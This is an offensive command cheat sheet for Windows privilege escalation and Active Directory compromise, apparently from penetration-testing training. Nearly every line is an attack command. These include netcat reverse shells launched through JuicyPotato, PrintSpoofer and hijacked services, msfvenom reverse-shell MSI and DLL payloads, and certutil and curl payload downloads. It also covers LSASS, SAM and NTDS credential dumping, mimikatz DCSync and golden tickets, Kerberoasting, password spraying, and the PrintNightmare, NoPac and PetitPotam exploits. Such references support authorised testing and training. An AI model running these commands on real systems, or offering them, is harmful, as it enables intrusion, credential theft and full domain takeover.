Windows PrivEsc & AD
Initial Enumeration
ipconfig /all
arp -a
route print
Get-MpComputerStatus
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone
set
systeminfo
wmic qfe
wmic product get name
tasklist /svc
query user
echo %USERNAME%
whoami /priv
whoami /groups
net user
net localgroup
net localgroup administrators
net accounts
netstat -ano
pipelist.exe /accepteula
gci \\.\pipe\
accesschk.exe /accepteula \\.\Pipe\lsass -v
PowerShell History & Environment
(Get-PSReadLineOption).HistorySavePath
gc (Get-PSReadLineOption).HistorySavePath
[environment]::OSVersion.Version
cmd /c echo %PATH%
Named Pipes
pipelist.exe /accepteula
gci \\.\pipe\
accesschk.exe /accepteula \\.\Pipe\lsass -v
Credential Hunting
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
gc 'C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
cd c:\Users\<user>\Documents & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
select-string -Path C:\Users\<user>\Documents\*.txt -Pattern password
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ *.config
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
cmdkey /list
.\SharpChrome.exe logins /unprotect
.\lazagne.exe all
Invoke-SessionGopher -Target <hostname>
netsh wlan show profile
netsh wlan show profile <profile_name> key=clear
rundll32 keymgr.dll,KRShowKeyMgr
runas /savecred /user:<username> cmd
SeImpersonate / SeAssignPrimaryToken
mssqlclient.py <user>@<ip> -windows-auth
enable_xp_cmdshell
xp_cmdshell whoami /priv
c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe <ip> 443 -e cmd.exe" -t *
c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe <ip> 8443 -e cmd"
TIP
JuicyPotato doesn’t work on Server 2019 / Win10 build 1809+. Use PrintSpoofer or RoguePotato.
SeDebugPrivilege — LSASS Dump
Get-Process lsass
procdump.exe -accepteula -ma lsass.exe lsass.dmp
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
pypykatz lsa minidump /path/to/lsass.dmp
SeBackupPrivilege
robocopy /B E:\Windows\NTDS .\ntds ntds.dit
SeTakeOwnershipPrivilege
dir /q C:\backups\wwwroot\web.config
takeown /f C:\backups\wwwroot\web.config
Get-ChildItem -Path 'C:\backups\wwwroot\web.config' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}
icacls "C:\backups\wwwroot\web.config" /grant <username>:F
SAM / NTDS Dump
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\security C:\security.save
reg.exe save hklm\system C:\system.save
move sam.save \\<ip>\<share>
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
vssadmin CREATE SHADOW /For=C:
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
robocopy /B E:\Windows\NTDS .\ntds ntds.dit
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
Event Log Readers
wevtutil qe Security /rd:true /f:text | Select-String "/user"
wevtutil qe Security /rd:true /f:text /r:<host> /u:<user> /p:<password> | findstr "/user"
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*' } | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}
DnsAdmins
msfvenom -p windows/x64/exec cmd='net group "domain admins" <user> /add /domain' -f dll -o adduser.dll
dnscmd.exe /config /serverlevelplugindll adduser.dll
wmic useraccount where name="<user>" get sid
sc.exe sdshow DNS
sc stop dns && sc start dns
reg query \\<dc_ip>\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters
reg delete \\<dc_ip>\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll
Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName <dc_hostname>
Add-DnsServerResourceRecordA -Name wpad -ZoneName <domain> -ComputerName <dc_hostname> -IPv4Address <ip>
Print Operators — SeLoadDriverPrivilege
cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"
reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1
EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys
.\DriverView.exe /stext drivers.txt && cat drivers.txt | Select-String -pattern Capcom
.\ExploitCapcom.exe
Service Abuse
c:\Tools\PsService.exe security AppReadiness
sc config AppReadiness binPath= "cmd /c net localgroup Administrators <user> /add"
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v "\""
accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\<user>\Downloads\nc.exe -e cmd.exe <ip> 443"
AlwaysInstallElevated
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
msfvenom -p windows/shell_reverse_tcp lhost=<ip> lport=<port> -f msi > shell.msi
msiexec /i c:\users\<user>\desktop\shell.msi /quiet /qn /norestart
UAC
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
curl http://<ip>:8080/srrstr.dll -O "C:\Users\<user>\AppData\Local\Microsoft\WindowsApps\srrstr.dll"
rundll32 shell32.dll,Control_RunDLL C:\Users\<user>\AppData\Local\Microsoft\WindowsApps\srrstr.dll
Scheduled Tasks
schtasks /query /fo LIST /v
Get-ScheduledTask | select TaskName,State
.\accesschk64.exe /accepteula -s -d C:\Scripts\
Misc Checks
Get-LocalUser
Get-WmiObject -Class Win32_OperatingSystem | select Description
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
get-process -Id <PID>
get-service | ? {$_.DisplayName -like 'Druva*'}
.\SharpUp.exe audit
Mount VHD / VMDK
guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmd
guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1
Windows Exploit Suggester
python2.7 windows-exploit-suggester.py --update
python2.7 windows-exploit-suggester.py --database <date>-mssb.xls --systeminfo win7lpe-systeminfo.txt
File Transfers (certutil)
certutil.exe -urlcache -split -f http://<ip>:8080/shell.bat shell.bat
certutil -encode file1 encodedfile
certutil -decode encodedfile file2
AD — Initial Enumeration
nslookup ns1.<domain>
sudo tcpdump -i <interface>
sudo responder -I <interface> -A
fping -asgq <ip_range>
sudo nmap -v -A -iL hosts.txt -oN /home/<user>/host-enum
kerbrute userenum -d <domain> --dc <ip> jsmith.txt -o kerb-results
LLMNR / NBT-NS Poisoning
sudo responder -I <interface>
hashcat -m 5600 <ntlmv2_hash> /usr/share/wordlists/rockyou.txt
Import-Module .\Inveigh.ps1
(Get-Command Invoke-Inveigh).Parameters
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
.\Inveigh.exe
Password Policy & Spraying
crackmapexec smb <ip> -u <user> -p <password> --pass-pol
rpcclient -U "" -N <ip>
rpcclient $> querydominfo
enum4linux -P <ip>
enum4linux-ng -P <ip> -oA <output>
ldapsearch -h <ip> -x -b "DC=<domain>,DC=<tld>" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
net accounts
Import-Module .\PowerView.ps1
Get-DomainPolicy
enum4linux -U <ip> | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
rpcclient $> enumdomusers
crackmapexec smb <ip> --users
ldapsearch -h <ip> -x -b "DC=<domain>,DC=<tld>" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
python3 windapsearch.py --dc-ip <ip> -u "" -U
for u in $(cat valid_users.txt); do rpcclient -U "$u%<password>" -c "getusername;quit" <ip> | grep Authority; done
kerbrute passwordspray -d <domain> --dc <ip> valid_users.txt <password>
sudo crackmapexec smb <ip> -u valid_users.txt -p <password> | grep +
sudo crackmapexec smb <ip> -u <user> -p <password>
sudo crackmapexec smb --local-auth <ip_range> -u administrator -H <hash> | grep +
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password <password> -OutFile spray_success -ErrorAction SilentlyContinue
Security Controls
Get-MpComputerStatus
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$ExecutionContext.SessionState.LanguageMode
Find-LAPSDelegatedGroups
Find-AdmPwdExtendedRights
Get-LAPSComputers
Credentialed Enumeration
sudo crackmapexec smb <ip> -u <user> -p <password> --users
sudo crackmapexec smb <ip> -u <user> -p <password> --groups
sudo crackmapexec smb <ip> -u <user> -p <password> --loggedon-users
sudo crackmapexec smb <ip> -u <user> -p <password> --shares
sudo crackmapexec smb <ip> -u <user> -p <password> -M spider_plus --share <share>
smbmap -u <user> -p <password> -d <domain> -H <ip>
smbmap -u <user> -p <password> -d <domain> -H <ip> -R SYSVOL --dir-only
rpcclient $> queryuser 0x457
rpcclient $> enumdomusers
psexec.py <domain>/<user>:'<password>'@<ip>
wmiexec.py <domain>/<user>:'<password>'@<ip>
python3 windapsearch.py --dc-ip <ip> -u <domain>\<user> -p <password> --da
python3 windapsearch.py --dc-ip <ip> -u <domain>\<user> -p <password> -PU
sudo bloodhound-python -u '<user>' -p '<password>' -ns <ip> -d <domain> -c all
Living Off the Land (AD)
Get-Module
Import-Module ActiveDirectory
Get-ADDomain
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Get-ADTrust -Filter *
Get-ADGroup -Filter * | select name
Get-ADGroup -Identity "Backup Operators"
Get-ADGroupMember -Identity "Backup Operators"
PowerView
Import-Module .\PowerView.ps1
Export-PowerViewCSV
ConvertTo-SID
Get-DomainSPNTicket
Get-Domain
Get-DomainController
Get-DomainUser
Get-DomainUser -Identity <user> | Get-DomainSPNTicket -Format Hashcat
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\tgs.csv -NoTypeInformation
Get-DomainComputer
Get-DomainGroup
Get-DomainOU
Find-InterestingDomainAcl
Get-DomainGroupMember
Get-DomainFileServer
Get-DomainGPO
Get-DomainPolicy
Get-NetLocalGroup
Get-NetLocalGroupMember
Get-NetLocalGroupMember -ComputerName <hostname> -GroupName "Remote Desktop Users"
Get-NetShare
Get-NetSession
Test-AdminAccess
Find-DomainUserLocation
Find-DomainShare
Find-InterestingDomainShareFile
Find-LocalAdminAccess
Get-DomainTrust
Get-ForestTrust
Get-DomainForeignUser
Get-DomainForeignGroupMember
Get-DomainTrustMapping
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
$sid = Convert-NameToSid <user>
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
Snaffler
.\Snaffler.exe -d <domain> -s -v data
Kerberoasting
GetUserSPNs.py -dc-ip <ip> <domain>/
GetUserSPNs.py -dc-ip <ip> <domain>/<user> -request
GetUserSPNs.py -dc-ip <ip> <domain>/<user> -request-user <target_user> -outputfile <user>_tgs
hashcat -m 13100 <user>_tgs /usr/share/wordlists/rockyou.txt
setspn.exe -Q */*
setspn.exe -T <domain> -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
.\Rubeus.exe kerberoast /stats
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
.\Rubeus.exe kerberoast /user:<user> /nowrap
Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes
mimikatz # base64 /out:true
mimikatz # kerberos::list /export
echo "<base64>" | tr -d \\n | base64 -d > <user>.kirbi
python2.7 kirbi2john.py <user>.kirbi
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > tgs_hashcat
ASREPRoasting
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
.\Rubeus.exe asreproast /user:<user> /nowrap /format:hashcat
hashcat -m 18200 <hash> /usr/share/wordlists/rockyou.txt
kerbrute userenum -d <domain> --dc <ip> /opt/jsmith.txt
ACL Abuse
$SecPassword = ConvertTo-SecureString '<password>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<domain>\<user>', $SecPassword)
Set-DomainUserPassword -Identity <user> -AccountPassword $damundsenPassword -Credential $Cred -Verbose
Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members '<user>' -Credential $Cred2 -Verbose
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName
Set-DomainObject -Credential $Cred2 -Identity <user> -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
Set-DomainObject -Credential $Cred2 -Identity <user> -Clear serviceprincipalname -Verbose
Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members '<user>' -Credential $Cred2 -Verbose
ConvertFrom-SddlString
DCSync
Get-DomainUser -Identity <user> | select samaccountname,objectsid,memberof,useraccountcontrol | fl
$sid= "<user_sid>"
Get-ObjectAcl "DC=<domain>,DC=<tld>" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl
secretsdump.py -outputfile <domain>_hashes -just-dc <domain>/<user>@<ip>
secretsdump.py <domain>/<user>:'<password>'@<ip> -use-vss
mimikatz # lsadump::dcsync /domain:<domain> /user:<domain>\administrator
Privileged Access
evil-winrm -i <ip> -u <user> -p <password>
$password = ConvertTo-SecureString "<password>" -AsPlainText -Force
$cred = new-object System.Management.Automation.PSCredential ("<domain>\<user>", $password)
Enter-PSSession -ComputerName <hostname> -Credential $cred
Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain
Get-SQLQuery -Verbose -Instance "<ip>,1433" -username "<domain>\<user>" -password "<password>" -query 'Select @@version'
mssqlclient.py <domain>/<user>@<ip> -windows-auth
enable_xp_cmdshell
xp_cmdshell whoami /priv
NoPac (CVE-2021-42278/42287)
sudo python3 scanner.py <domain>/<user>:<password> -dc-ip <ip> -use-ldap
sudo python3 noPac.py <domain>/<user>:<password> -dc-ip <ip> -dc-host <dc_hostname> -shell --impersonate administrator -use-ldap
sudo python3 noPac.py <domain>/<user>:<password> -dc-ip <ip> -dc-host <dc_hostname> --impersonate administrator -use-ldap -dump -just-dc-user <domain>/administrator
PrintNightmare (CVE-2021-1675)
git clone https://github.com/cube0x0/CVE-2021-1675.git
pip3 uninstall impacket && git clone https://github.com/cube0x0/impacket && cd impacket && python3 ./setup.py install
rpcdump.py @<ip> | egrep 'MS-RPRN|MS-PAR'
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=8080 -f dll > backupscript.dll
sudo smbserver.py -smb2support CompData /path/to/backupscript.dll
sudo python3 CVE-2021-1675.py <domain>/<user>:<password>@<ip> '\\<ip>\CompData\backupscript.dll'
PetitPotam
sudo ntlmrelayx.py -debug -smb2support --target http://<ca_host>/certsrv/certfnsh.asp --adcs --template DomainController
git clone https://github.com/topotam/PetitPotam.git
python3 PetitPotam.py <attacker_ip> <dc_ip>
python3 /opt/PKINITtools/gettgtpkinit.py <domain>/<dc_name>$ -pfx-base64 <cert> dc01.ccache
secretsdump.py -just-dc-user <domain>/administrator -k -no-pass "<dc_name>$"@<dc_fqdn>
klist
python3 /opt/PKINITtools/getnthash.py -key <key> <domain>/<dc_name>$
Misc AD Misconfigs
Import-Module .\SecurityAssessment.ps1
Get-SpoolStatus -ComputerName <dc_fqdn>
adidnsdump -u <domain>\\<user> ldap://<ip>
adidnsdump -u <domain>\\<user> ldap://<ip> -r
Get-DomainUser * | Select-Object samaccountname,description
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
ls \\<dc>\SYSVOL\<domain>\scripts
GPO Abuse
gpp-decrypt <hash>
crackmapexec smb -L | grep gpp
crackmapexec smb <ip> -u <user> -p <password> -M gpp_autologin
Get-DomainGPO | select displayname
Get-GPO -All | Select DisplayName
$sid=Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq $sid}
Get-GPO -Guid <gpo_guid>
ASREPRoasting
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
.\Rubeus.exe asreproast /user:<user> /nowrap /format:hashcat
hashcat -m 18200 <hash> /usr/share/wordlists/rockyou.txt
Domain Trusts
Import-Module activedirectory
Get-ADTrust -Filter *
Get-DomainTrust
Get-DomainTrustMapping
Get-DomainUser -Domain <child_domain> | select SamAccountName
Child → Parent Trust Escalation
mimikatz # lsadump::dcsync /user:<child_domain>\krbtgt
Get-DomainSID
Get-DomainGroup -Domain <parent_domain> -Identity "Enterprise Admins" | select distinguishedname,objectsid
mimikatz # kerberos::golden /user:hacker /domain:<child_domain> /sid:<child_sid> /krbtgt:<hash> /sids:<enterprise_admins_sid> /ptt
.\Rubeus.exe golden /rc4:<hash> /domain:<child_domain> /sid:<child_sid> /sids:<enterprise_admins_sid> /user:hacker /ptt
lookupsid.py <child_domain>/<user>@<ip>
lookupsid.py <child_domain>/<user>@<ip> | grep "Domain SID"
lookupsid.py <child_domain>/<user>@<ip> | grep -B12 "Enterprise Admins"
ticketer.py -nthash <krbtgt_hash> -domain <child_domain> -domain-sid <child_sid> -extra-sid <enterprise_admins_sid> hacker
export KRB5CCNAME=hacker.ccache
psexec.py <child_domain>/hacker@<dc_fqdn> -k -no-pass -target-ip <ip>
raiseChild.py -target-exec <ip> <child_domain>/<user>
mimikatz # lsadump::dcsync /user:<domain>\lab_adm
secretsdump.py <child_domain>/<user>@<child_dc_ip> -just-dc-user <child_domain>/krbtgt
Cross-Forest Trust Abuse
Get-DomainUser -SPN -Domain <target_domain> | select SamAccountName
Get-DomainUser -Domain <target_domain> -Identity <user> | select samaccountname,memberof
.\Rubeus.exe kerberoast /domain:<target_domain> /user:<user> /nowrap
Get-DomainForeignGroupMember -Domain <target_domain>
Enter-PSSession -ComputerName <dc_fqdn> -Credential <domain>\administrator
GetUserSPNs.py -request -target-domain <target_domain> <source_domain>/<user>
bloodhound-python -d <domain> -dc <dc_hostname> -c All -u <user> -p <password>
zip -r ilfreight_bh.zip *.json